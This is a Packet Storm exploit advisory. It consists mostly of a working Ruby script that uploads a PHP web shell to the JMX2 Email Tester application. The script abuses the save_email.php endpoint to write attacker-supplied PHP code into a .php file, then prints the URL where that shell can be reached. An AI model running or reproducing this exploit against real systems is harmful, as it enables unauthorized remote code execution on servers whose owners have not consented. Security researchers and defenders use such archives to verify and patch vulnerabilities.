JMX2 Email Tester Remote Shell Upload

2016-02-15T00:00:00
ID PACKETSTORM:135759
Type packetstorm
Reporter HaHwul
Modified 2016-02-15T00:00:00

Description

                                        
```ruby
# Exploit Title: JMX2 Email Tester - Web Shell Upload(save_email.php)
# Date: 2016-02-15
# Blog: http://www.hahwul.com
# Vendor Homepage: https://github.com/johnfmorton/jmx2-Email-Tester
# Software Link: https://github.com/johnfmorton/jmx2-Email-Tester/archive/master.zip
# Tested on: debian [wheezy]
# CVE : none

require "net/http"
require "uri"
require 'uri-handler'

if ARGV.length != 2
  puts "JMX2 Email Tester Web Shell Uploader"
  puts "Usage: #>ruby jmx2Email_exploit.rb [targetURL] [phpCode]"
  puts " targetURL(ex): http://127.0.0.1/vul_test/jmx2-Email-Tester"
  puts " phpCode(ex): echo 'zzzzz'"
  puts " Example : ~~.rb http://127.0.0.1/vul_test/jmx2-Email-Tester/emailTester 'echo zzzz'"
  puts " Install GEM: #> gem install uri-handler"
  puts " exploit & code by hahwul[www.hahwul.com]"
else
  target_url = ARGV[0] # http://127.0.0.1/jmx2-Email-Tester/
  shell = ARGV[1] # PHP Code
  shell = shell.to_uri
  exp_url = target_url + "/models/save_email.php"
  puts shell
  uri = URI.parse(exp_url)
  http = Net::HTTP.new(uri.host, uri.port)
  puts exp_url
  request = Net::HTTP::Post.new(uri.request_uri)
  request["Accept-Encoding"] = "gzip, deflate"
  request["Referer"] = "http://127.0.0.1/vul_test/jmx2-Email-Tester/emailTester/"
  request["User-Agent"] = "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:44.0) Gecko/20100101 Firefox/44.0"
  request["Accept"] = "application/json, text/javascript, */*; q=0.01"
  request["Content-Type"] = "application/x-www-form-urlencoded; charset=UTF-8"
  request["Connection"] = "keep-alive"
  request.set_form_data({"orgfilename"=>"test-email-1455499197-org.html","thecontent"=>"%3Chtml%3E%0A%20%20%20%3C%3Fphp%20%0A#{shell}%0A%3F%3E%0A%3C%2Fhtml%3E","inlinefilename"=>"test-email-1455499197-inline.php"})
  response = http.request(request)

  puts "[Result] Status code: "+response.code
  puts "[Result] Open Browser: "+target_url+"/_saved_email_files/test-email-1455499197-inline.php"
end
```